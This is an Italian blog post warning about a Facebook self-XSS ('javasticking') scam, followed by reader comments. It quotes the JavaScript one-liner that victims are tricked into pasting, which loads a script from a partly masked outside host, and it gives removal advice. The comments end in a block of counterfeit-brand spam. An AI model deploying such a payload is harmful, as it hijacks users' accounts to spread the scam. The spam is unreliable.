Un nuovo attacco del tipo javasticking in lingua italiana è in atto da diverse ore su Facebook. Molti utenti stanno vedendosi letteralmente inondare la propria bacheca con miniature video che invitano alla visualizzazione di filmati dove si è protagonisti, in realtà inesistenti. L'invasione è del tipo "virale" da non confondere con "virus", anche se molti utenti e pagine confondono spesso questi termini, considerandoli la stessa cosa.
Infatti ecco cosa leggiamo su Facebook: "ATTENZIONE A TUTTI...... sulle bacheche compaiono degli strani video con provenienza youtube...mandati da una persone di quelle che abbiamo tra le nostre amicizie con una frase che più o meno dice così...CIAO, come stai? ma dimmi (il vostro nome) sei proprio tu in questo video? ecco NON APRIRLO ASSOLUTAMENTE contiene un link ruba profilo e quindi addio anche alle pagine eliminarlo istantaneamente dalla bacheca!Copialo e incollato nella tua bacheca e passate parola.CONDIVIDETE E FATE GIRARE".
In realtà non vi è alcun furto del profilo o di pagine, ma consiste "semplicemente" in una serie di comandi in javascript effettuate in maniera "quasi" automatica dall'utente che cade nella trappola. Si tratta di diversi post che contengono testi simili:
YouTube
www.facebook.com
[Nome] Pazzesco!! non posso credere che lo hai fatto davvero
Ciao [nome] ti hanno taggato in questo video?
YouTube
www.facebook.com
[Nome] Incredibile! Ma perche lo hai fatto
Ed inoltre:
Questa Ragazza deve essere pazza per aver fatto questo!
VIDE0
www.facebook.com
Cavolo ma le persone stanno proprio fuori! Ma come si fa a fare questa cosa!
Cominciano spiegando che i link "YouTube" e "VIDE0" non sono altro che collegamenti ipertestuali che riportano alla bacheca del profilo utente (http://www.facebook.com/profile.php?sk=wall). Se clicchiamo sulle false anteprime dei video, per coloro che hanno installato correttamente l'ultima versione di flash player, verrà visualizzato il seguente messaggio:
Controllo di sicurezza Facebook.
Per vedere il video segui i passaggi
Ci scusiamo per il disagio
Continue
Si tratta di una finestra di dialogo simile a quella che YouTube presenta quando il filmato non è disponibile nel paese dell'utilizzatore, quindi l'utente viene invitato a premere alcuni tasti in sequenza che nascondono istruzioni automatizzate.
Per prima cosa saremo invitati a selezionare l'URL presente sulla barra degli indirizzi, cliccare J (per cancellare l'URL) e dunque la combinazione di tasti CTRL + V. Con quest'ultima operazione incolleremo la seguente istruzione javascript: "(a=(b=document).createElement('script')).src='http://www.******saliensstreaming.com/tag/fb.php',b.body.appendChild(a);void(0)" e poi il tasto INVIO per confermare l'operazione.
In realtà l'utente avrà eseguito una serie una serie di azioni come se fosse lui stesso a compierle. Tali azioni si limitano, per adesso, all'autopubblicazione dello stesso post nella bacheca propria e in quelle degli amici, in modo da diffondersi viralmente. Il sito collegato ai post è il seguente:
Al momento non abbiamo rilevato malware (virus) e molti di questi link sono già stati bloccati da Facebook. Nonostante ciò questo nuovo metodo è riuscito a bypassare il controllo per queste tipologie di truffe da parte del sistema automatico di Facebook. Ciò perchè in precedenza era stato settato al massimo livello ed ha fatto si che molte applicazioni fossero disattivate per errore da Facebook.
Il consiglio è quello di rimuovere i post spam dalle vostre bacheche, passando il mouse in alto a destra del post e cliccando sulla X che appare. in questo modo potrete rimuovere sia il post che la preferenza alla pagina o applicazione.
Se ciò non dovesse essere sufficiente, potete controllare l'eventuale preferenza data inconsapevolmente a pagine sconosciute, collegandovi http://www.facebook.com/editprofile.php?sk=activities e per verificare le applicazioni usate http://www.facebook.com/settings/?tab=applications. Informate i vostri amici e prestate attenzione prima di compiere qualsiasi azione "inusuale" sul social newtork, in special modo quando ricevete post o link dai vostri amici. Infatti nella stragrande maggioranza di queste tipologie di truffe è proprio l'amico ad essere veicolo inconsapevole.
E' verissimo, io infatti ho eseguito il javascript proprio per vedere cosa faceva, non conosco bene il linguaggio del genere, però in una decina di minuti elimini tutti i video, LOL
RispondiEliminama se uno clicca sopra a questi finti video che succede?
RispondiEliminaper sbaglio ho aperto la pagina del video uguale a questi descritti perchè non ero informata, ma non ho seguito le istruzioni. Ho subito chiuso la pagina e cancellato il video dalla mia bacheca. Devo fare qualche altra operazione per controllare se tutto è apposto?
RispondiEliminaNulla...tutto, ok
RispondiEliminaio ho aperto il video e ho cambiato immediatamente la password visto che c'èra scritto nelle istruzioni però mio fratello ha perso completamente il suo profilo.. sapete come si fà ha recuperarlo?
RispondiEliminaio ho ricevuto il video ma lo cancellato subito il problema si è verificato dopo poco, mi è stato richiesto per due volte di rifare l'accesso a fb nonostante fossi all'interno di fb. Io come una "polla" ho rifatto l'accesso inserendo tutti i dati e la password e così mi sono ritrovata a non poter più accedere alla mia mail di riferimento di fb... ho dovuto cambiare password e nome... volevo sapere mi hanno rubato le credenziali? Devo fare altri passaggi?
RispondiEliminaio ho cliccato sul link di un mio amico ma non mi è uscita nessuna schermata di digitazione, semplicemente sono stata rimandata sulla pagina del mio profilo...quindi cos'è successo? ho cambiato cmq la password, ho sbagliato?
RispondiEliminaè SUCCESSO LO STESSO ANCHE A Me! ho cliccato sul link di un mio amico ma non mi è uscita nessuna schermata di digitazione, semplicemente sono stata rimandata sulla pagina del mio profilo... cambio la pw.. speo sia sufficente..
RispondiEliminaPerso in che senso? non può accedervi? Se nel momento in cui si accede facebook comunica password errata, bisogna effettuare la procedura di recupero indicata. se non si riesce nemmeno in quel modo è possibile segnalare l'account come 'È il mio profilo, ma non posso più accedervi'
RispondiEliminaanche io ho cliccato inavvertitamente su uno d questi video...mi mandava sul mio profilo. ho cambiato pssw e per ora accedo senza problemi. devo ritenermi tranquillo? grazie...
RispondiEliminaidem (rimanda alla pagina della bacheca) può dipendere dalla connessione protetta in https?
RispondiElimina...a me è successo con il video di bin laden che aveva lo stesso meccanismo...ho fatto a scansione del pc immediatamente ed ho trovato una sere di trojan...
RispondiEliminaRimanda in bacheca perchè molti sono stati già disattivati. Per Bin Laden intendi questo http://www.protezioneaccount.com/2011/05/bin-laden-attacchi-malware-javascript.html
RispondiEliminasalve, poco importa se perdo il profilo di facebook o le pagine. A me interessa sapere se attraverso questo sistema vedono tutto quello che c'è sul mio pc, posta e pssw comprese. Io non ho selezionato il link in alto, perchè grazie a..alla mia ignoranza, non ho capito che si riferiva all'indirizzo http in alto, e quindi ho cercato di copiare quello dell'esempio. Però ho cliccato ctrl +v+ invio. Posso stare tranquilla? oggi ho attivato un altro antivirus che scansiona tutto il pc PRIMA dell'avvio di windows. Lei admin, cosa consiglia per essere proprio sicuri di non essere spiati? Grazie per l'aiuto.
RispondiEliminaScusa ma può essere che per questo l'account ti si chiude e nn riesci ad entrare?Grazie
RispondiEliminaIl Javasticking su facebook fin'ora rilevato non ha portato a furto di password all'interno del browser, dunque se hai cambiato la password al tuo profilo facebook puoi star tranquilla per le password memorizzate nel browser. Se non hai effettuato alcun procedura di download o aperto pagine oltre quella già citata, la scansione antivirus in questi casi risulta perfettamente inutile.
RispondiEliminaCome faccio a creare video come quelli
RispondiEliminaIntendi false anteprime video?!
RispondiEliminaCome fanno i criminali informatici a creare le false anteprime dei video? Questo attacco ruba le password degli account? Poi come fanno a reindirizzare ad esempio su un sito nocivo??o di phishing??
RispondiEliminaCiao,ho aperto il video,ma mi sono sibito reso conto della fregatura e l'ho cancellato cambiando pure la password...mi hanno fregato il profilo o posso star tranquillo? alcuni mi hanno detto che è necessario cancellare l'account perchè l'hacker sarebbe ancora dentro!!
RispondiEliminaa me è apprso questo messaggio
RispondiEliminaei, ma sei proprio te in qsto video?? mi sembra strano... goo.gl/qeNY5?1997129
ed io, ignaro di tutto, ho cliccato, poi mi è apparsa una schermata che diceva che per motivi di sicurezza per attivare l'applicazione dovevo inserire il numero di telefono sul quale mi sarebbe arrivata una password da inserire, ed io come un fesso ho scritto il mio numero di cellulare ma avendo fiutato (aimè troppo tardi)il pericolo ho cancellato l'SMS.
Ora mi è venuto il dubbio che possano avermi clonato il numero di cellulare, è possibile?
A me invece è andata peggio. Ho stupidamente aperto ed ora il computer non si accende più. Che fare?
RispondiEliminaIo ho ricevuto questo post che diceva di vedere se nel video c'ero io, c'era un URL con le virgole al posto dei puti e mi veniva chiesto di fare la sostituzione e poi provare ad aprire il video, l'ho fatto, mi ha mandato su youtube e poi per vedere il video mi diceva di scaricare una nuova versione di flash player, fatto anche quello, accidenti a me!!!! Risultato ho inondato svariati amici di questo stesso post, e anche la mia ragazza che usa lo stesso pc ha avuto lo stesso problema, io al momento ho cambiato la password e poi ho disabilitato tutte le applicazioni e ho tolto nelle info una cosa di Bin Laden, che altro dovrei fare?
RispondiEliminala tecnica che stanno usando in questo momento in atto su facebook...al 25/1/2012..e aver collegato il filmato al mi piace della pagina..di una pagina..e stanno prendendo piu' di 1000 "mi piace" ogni 4-5 ore...strano che nessuno li ferma..il video è quello di Brand Russel e....home sex ecc
RispondiEliminanon penso che si possa clonare un numero di telefono semplicemente avendolo... no?
RispondiEliminaPiù che altro è possibile che ti intasino il cellulare di sms inutili e pubblicitari.
2015-12-14keyun
RispondiEliminauggs for sale
abercrombie fitch
coach outlet
louis vuitton
michael kors outlet sale
vans sneakers
ralph lauren outlet
the north face jackets
louis vuitton handbags
tods outlet store
toms
canada goose outlet
oakley sunglasses
tory burch outlet
nike trainers sale
michael kors
louis vuitton bags
fake oakley sunglasses
north face
pandora jewelry
north face jackets
coach factory outlet online
coach factory outlet
ugg outlet store
concord 11
hollister kids
michael kors outlet clearance
supra shoes
abercrombie and fitch
ralph lauren outlet
hollister
gucci outlet
louis vuitton outlet online
air max 90
ugg outlet
retro 11
cheap uggs
cheap ugg boots
michael kors handbags
coach outlet
ralph lauren polo
RispondiEliminaoakley sunglasses
burberry outlet store
air max 90
ugg boots
ugg outlet
beats by dre
chaussure louboutin
beats by dr dre
nike roshe
beats headphones
lacoste polo shirts
michael kors online
coach outlet online
ugg boots on sale
longchamp outlet
true religion jeans
tory burch outlet
louis vuitton handbags outlet
ray ban sunglasses
canada goose jackets
true religion jeans
ralph lauren pas cher
chicago blackhawks jerseys
nike mercurial
ralph lauren polo
nike trainers
michael kors outlet online
foamposite shoes
fitflop sale
moncler outlet
coach outlet online
thomas sabo uk
mcm backpack
beats headphones
moncler outlet
cheap uggs
0808jianxiang